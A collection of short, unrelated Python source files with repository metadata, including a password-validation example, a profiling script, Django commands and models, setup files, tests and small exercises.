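`clean_old_password` shows Django's field-level validation pattern: read the value from `cleaned_data`, raise `ValidationError` on failure, and return the cleaned value otherwise. The same flow framework-free (hypothetical names; `check_password` stands in for `user.check_password`):

```python
class ValidationError(Exception):
    pass


def clean_old_password(check_password, old_password):
    # Raise when the stored credential does not match, otherwise
    # hand the cleaned value back, exactly as the form method does.
    if not check_password(old_password):
        raise ValidationError("Current password does not match!")
    return old_password
```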
bfa3605c47fc0b3969cc4eda539cf73c379877be | 274 | py | Python | ci/scripts/run_profile.py | destin-v/dev | afc26d3b12b200c38ec99b0ecc6a483aef6ba359 | [
"MIT"
] | null | null | null | ci/scripts/run_profile.py | destin-v/dev | afc26d3b12b200c38ec99b0ecc6a483aef6ba359 | [
"MIT"
] | null | null | null | ci/scripts/run_profile.py | destin-v/dev | afc26d3b12b200c38ec99b0ecc6a483aef6ba359 | [
"MIT"
] | null | null | null | import os
# Set up the terminal size because the output file is tied to terminal sizing.
os.environ["LINES"] = "25"
os.environ["COLUMNS"] = "200"
# Profile the code. For additional options see $ scalene -h
os.system("scalene --outfile ./docs/profile.html --html main.py")
| 30.444444 | 77 | 0.718978 | 42 | 274 | 4.690476 | 0.761905 | 0.091371 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021459 | 0.149635 | 274 | 8 | 78 | 34.25 | 0.824034 | 0.489051 | 0 | 0 | 0 | 0 | 0.50365 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bfb397fd775c83e67d42d42f2789867f7f37c43a | 261 | py | Python | ce_detector/__main__.py | cauliyang/ce_detector | 869275a7b3a78b9732f7d0aba4d86176708edefc | [
"MIT"
] | null | null | null | ce_detector/__main__.py | cauliyang/ce_detector | 869275a7b3a78b9732f7d0aba4d86176708edefc | [
"MIT"
] | null | null | null | ce_detector/__main__.py | cauliyang/ce_detector | 869275a7b3a78b9732f7d0aba4d86176708edefc | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
""" script for running in the terminal
@author: YangyangLi
@contact:li002252@umn.edu
@license: MIT Licence
@file: __main__.py
@time: 2020/12/21 5:02 PM
"""
from cli import cli
if __name__ == "__main__":
    cli()
| 18.642857 | 38 | 0.678161 | 40 | 261 | 4.125 | 0.925 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.086364 | 0.157088 | 261 | 13 | 39 | 20.076923 | 0.663636 | 0.731801 | 0 | 0 | 0 | 0 | 0.131148 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
bfb94eca076a77581409f0ec4eef08ffd2ee368f | 292 | py | Python | DQM/EcalPreshowerMonitorModule/python/ESPedestalTask_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQM/EcalPreshowerMonitorModule/python/ESPedestalTask_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | DQM/EcalPreshowerMonitorModule/python/ESPedestalTask_cfi.py | pasmuss/cmssw | 566f40c323beef46134485a45ea53349f59ae534 | [
"Apache-2.0"
] | null | null | null | import FWCore.ParameterSet.Config as cms
ecalPreshowerPedestalTask = cms.EDAnalyzer('ESPedestalTask',
    LookupTable = cms.untracked.FileInPath("EventFilter/ESDigiToRaw/data/ES_lookup_table.dat"),
    DigiLabel = cms.InputTag("ecalPreshowerDigis"),
    OutputFile = cms.untracked.string("")
)
| 29.2 | 92 | 0.787671 | 29 | 292 | 7.862069 | 0.827586 | 0.105263 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.092466 | 292 | 9 | 93 | 32.444444 | 0.860377 | 0 | 0 | 0 | 0 | 0 | 0.274914 | 0.164948 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.166667 | 0 | 0.166667 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
bfba0e033a1b883577a1e63675eab18f30855927 | 392 | py | Python | sorl/thumbnail_standalone/conf/__init__.py | kreopt/sorl-thumbnail | cbc02e642c45e6206234bcfb0562c243ecffacf7 | [
"BSD-3-Clause"
] | null | null | null | sorl/thumbnail_standalone/conf/__init__.py | kreopt/sorl-thumbnail | cbc02e642c45e6206234bcfb0562c243ecffacf7 | [
"BSD-3-Clause"
] | null | null | null | sorl/thumbnail_standalone/conf/__init__.py | kreopt/sorl-thumbnail | cbc02e642c45e6206234bcfb0562c243ecffacf7 | [
"BSD-3-Clause"
] | null | null | null | from sorl.thumbnail_standalone.lazy import LazyObject
from sorl.thumbnail_standalone.conf import defaults
class Settings(object):
    pass


class LazySettings(LazyObject):
    def _setup(self):
        self._wrapped = Settings()
        for attr in dir(defaults):
            if attr == attr.upper():
                setattr(self, attr, getattr(defaults, attr))


settings = LazySettings()
| 23.058824 | 60 | 0.678571 | 44 | 392 | 5.954545 | 0.590909 | 0.061069 | 0.129771 | 0.206107 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.229592 | 392 | 16 | 61 | 24.5 | 0.86755 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0.090909 | 0.181818 | 0 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
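`LazySettings._setup` copies only the ALL-CAPS attributes from the defaults module, the usual convention for settings names. The copying rule in isolation (illustrative classes, not sorl's actual ones):

```python
class Defaults:
    THUMBNAIL_QUALITY = 95  # ALL-CAPS: treated as a setting
    helper_flag = True      # lowercase: ignored by the copy


class Settings:
    pass


def copy_settings(source):
    s = Settings()
    for attr in dir(source):
        if attr == attr.upper():  # dunders like __class__ also fail this test
            setattr(s, attr, getattr(source, attr))
    return s
```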
bfc7986a12cb6b98819b9416c8cff1e639a570c8 | 791 | py | Python | nodeconductor/structure/management/commands/init_balance_history.py | p-p-m/nodeconductor | bc702302ef65c89793452f0fd6ca9a6bec79782f | [
"Apache-2.0"
] | null | null | null | nodeconductor/structure/management/commands/init_balance_history.py | p-p-m/nodeconductor | bc702302ef65c89793452f0fd6ca9a6bec79782f | [
"Apache-2.0"
] | null | null | null | nodeconductor/structure/management/commands/init_balance_history.py | p-p-m/nodeconductor | bc702302ef65c89793452f0fd6ca9a6bec79782f | [
"Apache-2.0"
] | null | null | null | from datetime import timedelta
from django.core.management.base import BaseCommand
from django.utils import timezone
from nodeconductor.structure.models import BalanceHistory
from nodeconductor.structure.models import Customer
class Command(BaseCommand):
    help = """ Initialize demo records of balance history """

    def handle(self, *args, **options):
        self.stdout.write('Creating demo records of balance history for all customers')
        for customer in Customer.objects.all():
            for i in range(10):
                BalanceHistory.objects.create(customer=customer,
                                              created=timezone.now() - timedelta(days=i),
                                              amount=100 + i * 10)
        self.stdout.write('... Done')
| 35.954545 | 89 | 0.63464 | 85 | 791 | 5.905882 | 0.564706 | 0.039841 | 0.103586 | 0.12749 | 0.258964 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012302 | 0.280657 | 791 | 21 | 90 | 37.666667 | 0.869947 | 0 | 0 | 0 | 0 | 0 | 0.139064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.333333 | 0 | 0.533333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
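The command writes one backdated row per day, with the amount growing by 10 per step. The generated (created, amount) pairs, sketched without the ORM:

```python
from datetime import date, timedelta


def demo_history(start, n=10):
    # i = 0 is "today"; each step goes one day further back and adds 10.
    return [(start - timedelta(days=i), 100 + i * 10) for i in range(n)]
```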
bfc87c245c1b1446c2b1971de0668c9443c699a8 | 208 | py | Python | Week 1/5.py | ShruKin/Python-Assignments | f6b5d8b2e23f0d6f68d7acced43a1830c6ecebf3 | [
"MIT"
] | null | null | null | Week 1/5.py | ShruKin/Python-Assignments | f6b5d8b2e23f0d6f68d7acced43a1830c6ecebf3 | [
"MIT"
] | 1 | 2019-11-16T08:40:15.000Z | 2019-11-16T08:40:15.000Z | Week 1/5.py | ShruKin/Python-Assignments | f6b5d8b2e23f0d6f68d7acced43a1830c6ecebf3 | [
"MIT"
] | null | null | null | print("Kinjal Raykarmakar\nSec: CSE2H\tRoll: 29\n")
num = int(input("Enter a number: "))

if num % 2 == 0:
    print("{} is an even number".format(num))
else:
print("{} is an odd number".format(num)) | 26 | 51 | 0.615385 | 33 | 208 | 3.878788 | 0.69697 | 0.109375 | 0.140625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.029762 | 0.192308 | 208 | 8 | 52 | 26 | 0.732143 | 0 | 0 | 0 | 0 | 0 | 0.464115 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
bfc954c37a277e27749a709306aba7d412eb2924 | 615 | py | Python | setup.py | RichardScottOZ/pybedfroms | 4805823f0b25a27499c462be724d48866c261c03 | [
"BSD-3-Clause"
] | 1 | 2021-05-15T12:03:49.000Z | 2021-05-15T12:03:49.000Z | setup.py | RichardScottOZ/pybedfroms | 4805823f0b25a27499c462be724d48866c261c03 | [
"BSD-3-Clause"
] | null | null | null | setup.py | RichardScottOZ/pybedfroms | 4805823f0b25a27499c462be724d48866c261c03 | [
"BSD-3-Clause"
] | 1 | 2021-05-15T12:03:55.000Z | 2021-05-15T12:03:55.000Z | import io
import re
from glob import glob
from os.path import basename
from os.path import dirname
from os.path import join
from os.path import splitext
from setuptools import setup, find_packages
setup(
    name='pybedforms',
    version='0.0.1',
    long_description="tbd",
    url='https://github.com/andrewannex/pybedforms',
    author="Andrew Annex",
    author_email="annex@jhu.edu",
    license='BSD-3',
    packages=find_packages('src'),
    package_dir={'': 'src'},
    py_modules=[splitext(basename(path))[0] for path in glob('src/*.py')],
    requires=['numpy', 'numba', 'matplotlib'],
) | 25.625 | 74 | 0.674797 | 84 | 615 | 4.869048 | 0.571429 | 0.05868 | 0.0978 | 0.156479 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.009901 | 0.178862 | 615 | 24 | 75 | 25.625 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0.199675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.380952 | 0 | 0.380952 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
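The `py_modules` line maps each `src/*.py` path to a module name by stripping the directory and the extension. That transform in isolation:

```python
from os.path import basename, splitext


def module_names(paths):
    # "src/core.py" -> "core"
    return [splitext(basename(p))[0] for p in paths]
```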
449dbbf586feec17333bd94155ecc34ec0aee477 | 914 | py | Python | tests/test_logging.py | learnitall/foremanlite | 540688409f92d5a3caedc7e9805b0fdc02d73f03 | [
"MIT"
] | null | null | null | tests/test_logging.py | learnitall/foremanlite | 540688409f92d5a3caedc7e9805b0fdc02d73f03 | [
"MIT"
] | null | null | null | tests/test_logging.py | learnitall/foremanlite | 540688409f92d5a3caedc7e9805b0fdc02d73f03 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Test foremanlite.logging module."""
import pytest
import foremanlite.logging
pytestmark = pytest.mark.usefixtures("do_log_teardown")
def test_value_error_raised_if_file_path_not_given_for_setup():
    """Test `ValueError` raised if `file_path` is not given with `use_file`."""
    with pytest.raises(ValueError):
        foremanlite.logging.setup(use_file=True, file_path=None)
    with pytest.raises(ValueError):
        foremanlite.logging.setup(use_file=True, file_path=1)  # type: ignore
    foremanlite.logging.setup(use_file=False, file_path=None)


def test_get_gets_a_child_of_the_base_logger():
    """Test that `get` returns a child of the base logger."""
    foremanlite.logging.setup(use_stream=True)
    logger = foremanlite.logging.get("test")
    assert logger.name == foremanlite.logging.BASENAME + ".test"
    assert logger.hasHandlers()
| 29.483871 | 79 | 0.734136 | 125 | 914 | 5.136 | 0.448 | 0.224299 | 0.143302 | 0.161994 | 0.323988 | 0.277259 | 0.211838 | 0.211838 | 0.211838 | 0.211838 | 0 | 0.003827 | 0.142232 | 914 | 30 | 80 | 30.466667 | 0.815051 | 0.230853 | 0 | 0.142857 | 0 | 0 | 0.035037 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.142857 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
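The second test relies on the stdlib `logging` dotted-name hierarchy: `get` evidently returns a logger named `BASENAME + "." + name`, which makes it a child of the base logger. The stdlib mechanics, with the module name used illustratively:

```python
import logging

base = logging.getLogger("foremanlite")
child = base.getChild("test")  # same logger as logging.getLogger("foremanlite.test")
```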
44ae200982a7df36bc882c2e58aa4fb318690d98 | 437 | py | Python | nsz.py | denise-amiga/nsz | ab264c3da04a8c1e21cd67253f1519d5bec22836 | [
"MIT"
] | null | null | null | nsz.py | denise-amiga/nsz | ab264c3da04a8c1e21cd67253f1519d5bec22836 | [
"MIT"
] | null | null | null | nsz.py | denise-amiga/nsz | ab264c3da04a8c1e21cd67253f1519d5bec22836 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This is needed as multiprocessing shouldn't include nsz,
# as it won't be able to obtain __main__.__file__ and so would crash inside Keys.py
if __name__ == '__main__':
    import sys
    if sys.hexversion < 0x03060000:
        raise ImportError("NSZ requires at least Python 3.6!\nCurrent python version is " + sys.version)
    import multiprocessing
    multiprocessing.freeze_support()
    import nsz
    nsz.main()
| 31.214286 | 98 | 0.745995 | 65 | 437 | 4.753846 | 0.738462 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.03523 | 0.155606 | 437 | 13 | 99 | 33.615385 | 0.802168 | 0.400458 | 0 | 0 | 0 | 0 | 0.267442 | 0 | 0 | 0 | 0.03876 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
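`sys.hexversion` packs the interpreter version into a single integer (`0x03060000` is 3.6.0 with the release level and serial zeroed), so the comparison is a compact minimum-version check. The more readable equivalent uses the comparable `version_info` tuple:

```python
import sys

# version_info compares element-wise: (major, minor, micro, releaselevel, serial)
meets_minimum = sys.version_info >= (3, 6)
```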
44afcc4387be509529e32cba753788dfccffd29e | 1,350 | py | Python | tests/sample_train_execution.py | mlspec/mlspeclib-action-docker | 2709ff39d4defc4ece07c2b3f36b5b571bab4bd2 | [
"MIT"
] | null | null | null | tests/sample_train_execution.py | mlspec/mlspeclib-action-docker | 2709ff39d4defc4ece07c2b3f36b5b571bab4bd2 | [
"MIT"
] | null | null | null | tests/sample_train_execution.py | mlspec/mlspeclib-action-docker | 2709ff39d4defc4ece07c2b3f36b5b571bab4bd2 | [
"MIT"
] | null | null | null | from mlspeclib import MLSchema, MLObject
from random import randint, random, randrange
from pathlib import Path
import uuid
results_ml_object.set_type(
    schema_type=result_ml_object_schema_type,  # noqa
    schema_version=result_ml_object_schema_version,  # noqa
)

# Mocked up results
return_dict = {
    "training_execution_id": uuid.uuid4(),
    "accuracy": float(f"{randrange(93000,99999)/100000}"),
    "global_step": int(f"{randrange(50,150) * 100}"),
    "loss": float(f"{randrange(10000,99999)/1000000}"),
}
results_ml_object.training_execution_id = return_dict["training_execution_id"]
results_ml_object.accuracy = return_dict["accuracy"]
results_ml_object.global_step = return_dict["global_step"]
results_ml_object.loss = return_dict["loss"]
# Execution metrics
results_ml_object.execution_profile.system_memory_utilization = random()
results_ml_object.execution_profile.network_traffic_in_bytes = randint(7e9, 9e10)
results_ml_object.execution_profile.gpu_temperature = randint(70, 130)
results_ml_object.execution_profile.disk_io_utilization = random()
results_ml_object.execution_profile.gpu_percent_of_time_accessing_memory = random()
results_ml_object.execution_profile.cpu_utilization = random()
results_ml_object.execution_profile.gpu_utilization = random()
results_ml_object.execution_profile.gpu_memory_allocation = random()
| 40.909091 | 83 | 0.817778 | 183 | 1,350 | 5.617486 | 0.360656 | 0.116732 | 0.189689 | 0.18677 | 0.381323 | 0.264591 | 0.195525 | 0.148833 | 0 | 0 | 0 | 0.042071 | 0.084444 | 1,350 | 32 | 84 | 42.1875 | 0.789644 | 0.033333 | 0 | 0 | 0 | 0 | 0.135385 | 0.080769 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.153846 | 0 | 0.153846 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
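The mocked metrics round-trip each number through an f-string (`float(f"{...}")`), which is redundant: the division already yields a float. A direct, seeded sketch of the same ranges (the seeding is my addition, for reproducibility):

```python
import random


def mock_metrics(seed=0):
    rng = random.Random(seed)  # a private RNG instance, deterministic per seed
    return {
        "accuracy": rng.randrange(93000, 99999) / 100000,  # 0.93 .. 0.99998
        "global_step": rng.randrange(50, 150) * 100,       # multiples of 100
        "loss": rng.randrange(10000, 99999) / 1000000,     # 0.01 .. 0.099998
    }
```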
44b58f6544668f819c00e24e877afe4af5efa544 | 261 | py | Python | weather/distanceCheck.py | huberf/PAL | 5e7d5502ad969c6ae362c292b939b1fe768678d6 | [
"MIT"
] | 1 | 2021-03-22T04:05:21.000Z | 2021-03-22T04:05:21.000Z | weather/distanceCheck.py | huberf/PAL | 5e7d5502ad969c6ae362c292b939b1fe768678d6 | [
"MIT"
] | null | null | null | weather/distanceCheck.py | huberf/PAL | 5e7d5502ad969c6ae362c292b939b1fe768678d6 | [
"MIT"
] | null | null | null | import forecaster as w
import os  # needed for os.environ below; missing in the original

myWeather = w.Weather(os.environ['DARK_SKY_KEY'])
distance = myWeather.stormDistance('35.1391218,-85.99808539999998')

if distance < 5:
    print("Storm nearby. Batten the hatches.")
else:
    print("No storm nearby, but keep your eyes open.")
| 32.625 | 67 | 0.750958 | 38 | 261 | 5.105263 | 0.842105 | 0.113402 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.114035 | 0.126437 | 261 | 7 | 68 | 37.285714 | 0.736842 | 0 | 0 | 0 | 0 | 0 | 0.440613 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.142857 | null | null | 0.285714 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
44bef23fdc95fafb1ebb9c7cc9bc406442beb8e7 | 110 | py | Python | DSA Learning Series/Easy Problems to Get Started/Triangle With Angle (ANGTRICH)/triangle_with_angle.py | Ekalaivanpj/codechef | 0adabcabe1dde60be5ee822878ce01057a351fbb | [
"Apache-2.0"
] | 4 | 2021-05-20T08:21:36.000Z | 2022-03-26T03:56:20.000Z | DSA Learning Series/Easy Problems to Get Started/Triangle With Angle (ANGTRICH)/triangle_with_angle.py | Ekalaivanpj/codechef | 0adabcabe1dde60be5ee822878ce01057a351fbb | [
"Apache-2.0"
] | 5 | 2021-03-30T05:07:16.000Z | 2021-05-02T04:09:39.000Z | DSA Learning Series/Easy Problems to Get Started/Triangle With Angle (ANGTRICH)/triangle_with_angle.py | Ekalaivanpj/codechef | 0adabcabe1dde60be5ee822878ce01057a351fbb | [
"Apache-2.0"
] | 3 | 2021-03-27T12:20:09.000Z | 2021-10-05T16:53:16.000Z | lst=list(map(int, input().split()))
if sum(lst)==180 and 0 not in lst:
print('YES')
else:
print('NO')
| 18.333333 | 35 | 0.590909 | 20 | 110 | 3.25 | 0.85 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044444 | 0.181818 | 110 | 5 | 36 | 22 | 0.677778 | 0 | 0 | 0 | 0 | 0 | 0.045455 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.4 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
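The ANGTRICH snippet above accepts three angles as a triangle when they sum to 180 and none is zero. A minimal standalone sketch of the same check (the helper name `is_valid_triangle` is illustrative, not from the original submission):

```python
def is_valid_triangle(angles):
    # Three angles form a triangle when they sum to 180 degrees
    # and every angle is non-zero, mirroring the snippet's logic.
    return sum(angles) == 180 and 0 not in angles


print(is_valid_triangle([60, 60, 60]))   # -> True
print(is_valid_triangle([100, 80, 0]))   # -> False
```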
44c197b2e3a97430b3af4a8dd1cf13513d1a5653 | 292 | py | Python | 53. Maximum Subarray.py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | 4 | 2020-11-17T05:24:24.000Z | 2021-06-14T21:01:45.000Z | 53. Maximum Subarray.py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | 53. Maximum Subarray.py | Dharaneeshwar/Leetcode | cc3ed07f6ac5f4d6e3f60c57a94a06a8be2f5287 | [
"MIT"
] | null | null | null | from typing import List


class Solution:
def maxSubArray(self, nums: List[int]) -> int:
current_max=nums[0]
global_max=nums[0]
for i in range(1,len(nums)):
current_max=max(nums[i],current_max+nums[i])
global_max=max(current_max,global_max)
return global_max | 36.5 | 56 | 0.616438 | 43 | 292 | 4 | 0.44186 | 0.232558 | 0.162791 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013953 | 0.263699 | 292 | 8 | 57 | 36.5 | 0.786047 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
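The `maxSubArray` method above is Kadane's algorithm. A standalone function with the same logic, for illustration outside the LeetCode `Solution` wrapper (the name `max_subarray` is illustrative):

```python
def max_subarray(nums):
    # Track the best sum ending at the current index and the best overall.
    current_max = nums[0]
    global_max = nums[0]
    for x in nums[1:]:
        # Either extend the previous subarray or start fresh at x.
        current_max = max(x, current_max + x)
        global_max = max(global_max, current_max)
    return global_max


print(max_subarray([-2, 1, -3, 4, -1, 2, 1, -5, 4]))  # -> 6
```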
44e0a725a63a8c55f7eb9e145b07cc5fbf3064a8 | 223 | py | Python | pychemia/io/__init__.py | petavazohi/PyChemia | e779389418771c25c830aed360773c63bb069372 | [
"MIT"
] | 67 | 2015-01-31T07:44:55.000Z | 2022-03-21T21:43:34.000Z | pychemia/io/__init__.py | petavazohi/PyChemia | e779389418771c25c830aed360773c63bb069372 | [
"MIT"
] | 13 | 2016-06-03T19:07:51.000Z | 2022-03-31T04:20:40.000Z | pychemia/io/__init__.py | petavazohi/PyChemia | e779389418771c25c830aed360773c63bb069372 | [
"MIT"
] | 37 | 2015-01-22T15:37:23.000Z | 2022-03-21T15:38:10.000Z | """
Routines to import and export atomic structures.
Currently supported are *ASCII*, *CIF* and *XYZ*
"""
from . import cif
from . import ascii
from . import xyz
# __all__ = filter(lambda s: not s.startswith('_'), dir())
| 20.272727 | 58 | 0.695067 | 31 | 223 | 4.83871 | 0.677419 | 0.2 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.170404 | 223 | 10 | 59 | 22.3 | 0.810811 | 0.695067 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
44f6a91fa13949d563a870cd5ef247e7869f85bb | 2,234 | py | Python | db/food_database/models.py | IBPA/FoodAtlas | 0a431f0a391adaa8984b380f3f6f7189f27b9311 | [
"Apache-2.0"
] | 1 | 2022-02-07T10:04:35.000Z | 2022-02-07T10:04:35.000Z | db/food_database/models.py | IBPA/FoodAtlas | 0a431f0a391adaa8984b380f3f6f7189f27b9311 | [
"Apache-2.0"
] | null | null | null | db/food_database/models.py | IBPA/FoodAtlas | 0a431f0a391adaa8984b380f3f6f7189f27b9311 | [
"Apache-2.0"
] | null | null | null | from django.db import models
class Food(models.Model):
foodon_id = models.CharField(max_length=100)
foodb_id = models.CharField(max_length=100)
name = models.CharField(max_length=100)
synonyms = models.CharField(max_length=100)
# Create your models here.
class Chemical(models.Model):
foodb_id = models.CharField(max_length=100)
chebi_id = models.CharField(max_length=100)
name = models.CharField(max_length=100)
synonyms = models.CharField(max_length=100)
class FoodPart(models.Model):
name = models.CharField(max_length=100)
plant_ontology_id = models.CharField(max_length=100)
class Units(models.Model):
name = models.CharField(max_length=100)
# units_ontology_id
class Article(models.Model):
pmid = models.TextField()
doi = models.TextField()
class FoodChemicalRelationshipEvidence(models.Model):
text = models.TextField() # premise
article = models.ForeignKey(Article, on_delete=models.DO_NOTHING)
class FoodChemicalRelationship(models.Model):
food = models.ForeignKey(Food, on_delete=models.DO_NOTHING)
chemical = models.ForeignKey(Chemical, on_delete=models.DO_NOTHING)
# food_part = models.ForeignKey(FoodPart, on_delete=models.DO_NOTHING)
concentration = models.FloatField(null=True)
# units = models.ForeignKey(Units, on_delete=models.DO_NOTHING)
# evidences = models.ManyToManyField(FoodChemicalRelationshipEvidence)
# label = (
# models.TextField()
# ) # human annotated label, entailed or not entailed
# prediction = (
# models.FloatField()
# ) # model predicted probability of entailment
# class FoodChemicalRelationshipPrediction(models.Model):
# proba_entails = models.FloatField()
# relationship = models.ForeignKey(FoodChemicalRelationship, on_delete=models.DO_NOTHING)
# evidence = models.ForeignKey(FoodChemicalRelationshipEvidence, on_delete=models.DO_NOTHING)
# class FoodChemicalRelationshipAnnotation(models.Model):
# label = models.CharField(max_length=100)
# relationship = models.ForeignKey(FoodChemicalRelationship, on_delete=models.DO_NOTHING)
# evidence = models.ForeignKey(FoodChemicalRelationshipEvidence, on_delete=models.DO_NOTHING)
